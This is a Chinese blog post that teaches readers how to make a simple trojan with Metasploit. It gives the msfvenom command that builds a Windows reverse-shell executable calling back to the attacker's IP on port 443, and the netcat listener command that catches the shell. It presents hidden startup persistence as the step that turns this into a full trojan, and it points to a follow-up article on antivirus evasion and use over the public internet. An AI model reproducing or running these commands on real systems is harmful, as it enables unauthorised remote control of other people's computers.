木马制作方法是什么(怎么制作木马)

图标

王豆瓜

豆瓜网

豆瓜网专栏

独家首发
王豆瓜 图标 2019-12-30 00:41:43

木马这种高大上的骇客软件,似乎一直专属于程序员和黑客的电脑玩具。普通人要想制作自己的木马,以前要不就是要自学编程,学习一下tcp之类的各种协议编程,要不就是用别人写的木马生成器工具来生成。自从H.D. Moore这个黑客在2003年发布了Metasploit,计算机安全状况被永久性地改变了,黑客的定义也变化了。一夜之间,任何人都可以成为黑客了,人人都可以制作自己需要的木马了。当然用Metasploit来生成的Meterpreter这个兼木马和渗透功能一体的后门是功能最强大的,定制化也是最高的,但写在回答里就太长了,所以我在这里教大家用Metasploit生成一款简单的反弹木马,以此做个示例就可以了。

木马制作

Metasploit的windows版下载地址在https://windows.metasploit.com/,这里是最新版。我比较习惯用带有Metasploit的pentestbox,下载地址在http://www.pentestbox.org/。

一、生成一个反弹到你本机IP的exe

命令行下本机运行ipconfig,得自己本机的ip为192.168.1.100

pentestbox界面下运行:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=443 -f exe -o d:/443.exe

其中192.168.1.100是你本机ip,443端口和443.exe你可以换成别的端口和别的名字。

二、本机nc工具监听443端口,另一台和你同网段的虚拟机执行443.exe,木马上线

命令为nc -vvlp 443,和上文生成的木马443.exe的端口相对应。

另一台虚拟机执行443.exe,nc界面就有反应了,就会得到另一台机器的反弹shell(看下图,我是在本机执行了下,得到了本机的反弹shell)。

当然,这个443.exe还称之不为木马,只能算是一个简单的反弹程序,不过已经具备了木马的雏形。只要你能让443.exe做到更隐蔽和持久化控制,像加入启动项不被人发现,就算是一个完整的木马了。

三、附加问题

也许有的你会问,你是在内网里测试的木马呀,我去公网的话,你这个443.exe还能使用吗?你的443.exe免杀吗?你的443.exe支持64位机器吗?我的临听机器也在内网里,怎么办?这些都不是问题的,都可以的,我在头条上有篇详细的文章解答了这些问题,地址在https://www.toutiao.com/i6514056053976465927/,题目是《黑客头条字典,在公网环境下用虚拟机测试木马,以及如何防御?》。

如果你真的想自己从头做款木马,那你还是学习编程吧;如果你想快餐化地学习黑客知识,短时间内成为一个脚本黑客,关注我的头条号是一个不错的选择,有了一定基础再慢慢深入学习网络安全吧。


本文由豆瓜网专栏作家 王豆瓜 投稿发布,并经过豆瓜网编辑审核。

转载此文章须经作者同意,并附上出处(豆瓜网)及本页链接。

若稿件文字、图片、视频等内容侵犯了您的权益,请联系本站进行 投诉处理

相关搜索

木马制作
图标 图标

王豆瓜

豆瓜网

豆瓜网专栏

  • 董事长总裁ceo有哪些区别

    图标
    王豆瓜 图标 · 今天 13:41:25 · 576浏览
  • 无线路由最远多少米可以用

    图标
    王豆瓜 图标 · 今天 13:30:41 · 296浏览
  • 截图软件Snipaste

    截图软件Snipaste

    图标
    王豆瓜 图标 · 今天 13:14:10 · 443浏览
  • 全部评论

    王豆瓜

    豆瓜网

    豆瓜网专栏

  • 董事长总裁ceo有哪些区别
  • 无线路由最远多少米可以用
  • 截图软件Snipaste
  • vbs无限弹窗制作方法
  • c盘根目录这些文件需要了解清楚
  • 我来说两句